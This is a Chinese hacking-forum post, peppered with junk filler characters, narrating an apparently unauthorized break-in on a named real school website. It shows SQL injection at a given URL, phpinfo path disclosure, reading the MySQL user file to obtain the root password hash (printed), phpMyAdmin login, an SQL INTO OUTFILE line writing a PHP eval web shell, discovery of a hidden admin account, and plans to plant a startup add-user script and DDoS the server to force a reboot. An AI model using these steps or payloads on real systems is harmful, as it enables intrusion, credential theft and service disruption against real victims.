第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 j/ ]8 ]5 V9 J4 T
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!7 Z- i; z. J1 O8 b
1 V7 {& [7 Y/ |2 G. L. ]
" X2 v1 g+ J) c; t
7 I- Z' f4 V! c8 @% ^
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
5 c, O; e3 E% d8 K
9 v: L* m2 T l) V$ i0 J6 p6 P那么想可以直接写入shell ,getshell有几个条件:
: b. ~7 ]/ \2 K! v b* B1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ) c! c" C3 V" `, q4 E& K6 O* Y
; v/ Z& Q4 b& W% B; h% c( l试着爆绝对路径: " ]4 O# `" U4 ^% H6 N; s% p
1./phpMyAdmin/index.php?lang[]=1 ( l) c, V% K' E* b2 B, N: O% _$ j
2./phpMyAdmin/phpinfo.php 7 y; y1 s& {$ b# {
3./load_file() 7 O' r* {5 C1 Q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php 9 P9 N; W( j, @: q
5./phpmyadmin/libraries/select_lang.lib.php
" B+ h" p: P. a6./phpmyadmin/libraries/lect_lang.lib.php # X4 i R3 x/ W" j5 a+ T7 P
7./phpmyadmin/libraries/mcrypt.lib.php # b. j6 ~9 y6 c+ l( \/ Z3 w6 M0 S
8./phpmyadmin/libraries/export/xls.php
0 r: Z4 c: m; `/ \) S h- d0 w9 |% y6 v8 J
均不行........................... $ V5 G; f. Q' T& K) _; o m
! I# J% M A$ `0 A' C. b御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
) T( E$ t) H( A2 N( S0 d0 P( [- i! ?6 }5 z) f: O( \+ n) w
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ( L$ t. c" v" p& Z
2 G/ J* G& g( M% E% b: l默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
2 m, V) J: N* f& y
; {, L+ b7 ?* b. U) n( e敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... " ~) O( {% O0 D5 c% u @
9 ?7 ^! t ?: u" N) a
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
) N) M% Q5 K' V4 L0 g1 H ]
' J+ M8 l, X4 u: ^4 dhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 3 B! x; K9 V9 [7 g- {( J4 ]
9 P M8 ]2 W7 ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
- o- ^( l; w# i0 \3 \1 p0 M4 i: @ j2 z; G6 z2 k
成功读到root密码:
% f6 S/ ]' ~6 C8 p, R; W
' i! a# H$ C4 L H1 c8 r17---- r(0072) % [. y# L0 _- O
18---- o(006f)
; R. V2 F+ t+ v5 S* }19---- o(006f)
2 K) e' N* V4 X" F6 w+ F: x20---- t(0074) 1 c# T$ O4 y. K" n/ {
21---- *(002a) 4 E6 V' L# J$ y8 Y2 d
22---- 8(0038) , _; k, G; b6 N0 s
23---- 2(0032)
6 D8 c' B+ v5 O8 t* \: k24---- E(0045) 6 l( r4 V x3 P# c/ E
25---- 1(0031)
, J. q- ?) k# ]* L" j- k; R/ t ~# `26---- C(0043) 5 s \1 o& Z! I6 K' ~( v/ |
27---- 5(0035) " k* S- {) @3 b8 |1 a" {5 l2 D3 d
28---- 8(0038) 3 f1 F' f7 \3 v) V
29---- 2(0032)
& Q# O% X% x' S5 t; C30---- 8(0038)
9 \3 D1 K; O4 o3 p31---- A(0041) J' Z M! P, c( O) r* O ~) Y3 C
32---- 9(0039)
; v: o& s6 _, s9 i( }7 W F* _4 }33---- B(0042) / j W: C- Y. V b5 Z) Z
34---- 5(0035)
1 x, {7 J) b0 @, b35---- 4(0034) # ]! |3 h# ]- ^
36---- 8(0038)
( G' N' t: v9 f1 n$ C9 _37---- 6(0036)
5 d" r" \. z2 @3 X0 T3 n* p- I. d/ n38---- 4(0034) 0 f* ]8 v5 D* [
39---- 9(0039) 1 @, N& X( E$ Y( H3 ?
40---- 1(0031)
. {! ^) H1 C; D! f. [3 i5 P41---- 1(0031)
% b% Y" A! J2 W* ]- i/ s42---- 5(0035)
9 ~! T8 v7 O/ B. t* l4 Z0 V43---- 3(0033) & i3 Z/ s* _$ V
44---- 5(0035) / t9 |6 b, A C D( d
45---- 9(0039) . T; A; u3 W- ~2 B
46---- 8(0038)
+ ?0 V' j( S) [5 ~0 j+ r" @47---- F(0046) $ \3 ?+ J' j; w5 H9 e& ]
48---- F(0046)
( l! g! H2 C ^1 C49---- 4(0034)
5 |' B( q8 V" r50---- F(0046) ( \( R7 F. m$ N; F& P7 ?! Q* G
51---- 0(0030) + l3 {7 R9 m8 N. \" R @
52---- 3(0033) 2 N) V/ H# U, c* e
53---- 2(0032) - n6 x1 w7 r6 d. h0 S4 K
54---- A(0041) 1 x$ P: J+ h7 s0 ~ e( m c
55---- 4(0034)
+ l- _: b8 M, w( Y8 I56---- A(0041)
1 P. W/ c' F/ {: n57---- B(0042) ) ?! o+ Y0 p" v8 J: n1 g/ \1 h
58---- *(0044) 8 Z0 q8 W# \7 w! S/ ^& B9 v2 x6 D4 b
59---- *(0035) / W% g: ?( \. {% Q4 I1 t
60---- *(0041)
3 z+ U2 z: V" m0 {! f; o61---- *0032) 4 u v# G2 t0 h ?' A) A
4 ~ j1 U" y+ u解密后成功登陆phpmyamin
6 r) p' D# W, R' B' \* _! j
. z" Y j0 A A( o& H2 v
+ E6 m7 b) ~0 p. m& R. e
, v4 F$ [; {* v; a: s) T( z
- l/ X3 s1 X, j% u" V# `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
% V! T1 u4 G7 l! f/ X5 {, }: S" u5 a, B2 A5 F' z% E0 O
成功执行,拿下shell,菜刀连接:
, h, }. G) v! c& d! @3 V* T' B- u2 \
服务器不支持asp,aspx,php提权无果................... ' |2 j- ?& c; C; v! w. O% B
" N0 I$ d) U! T9 B _; ^& i( M& |但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
4 W6 `4 f" ?% I- ^& t* p! d服务器上已经有个隐藏帐号了
7 X& J0 \7 ^8 q( q; S9 m* Z3 ]别名 administrators/ V! ^8 Z. R* x6 g6 \- u M+ q
注释 管理员对计算机/域有不受限制的完全访问权
; _1 I) x0 K4 d2 a1 q( v, @成员
- T0 Q' T( v0 B( z# ~& t$ G0 T-------------------------------------------------------------------------------
3 W. |# }* D* u/ wadmin2 F( ?, U. K; ]+ J
Administrator/ P% @, x, D: |4 I( p# ]8 r/ V
slipper$5 R1 y @: ~6 H. I r. a4 {2 p
sqluser3 S$ c1 _. L* k' g8 o
命令成功完成。
% L- O! T7 F9 H
% P$ |, r0 e' W) p2 M0 |6 c/ `服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。 ~* |) i# |0 X! `' ~9 j
- v4 s# d, O. T0 O/ T% Gddos服务器重启,不然就只能坐等服务器重启了...............................
7 @; C* w) q9 ?7 E; N# ?1 ^0 G
) K' E2 t* v$ ^- p; G# e% @
& J$ V6 ?# r. x( c% J3 H | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
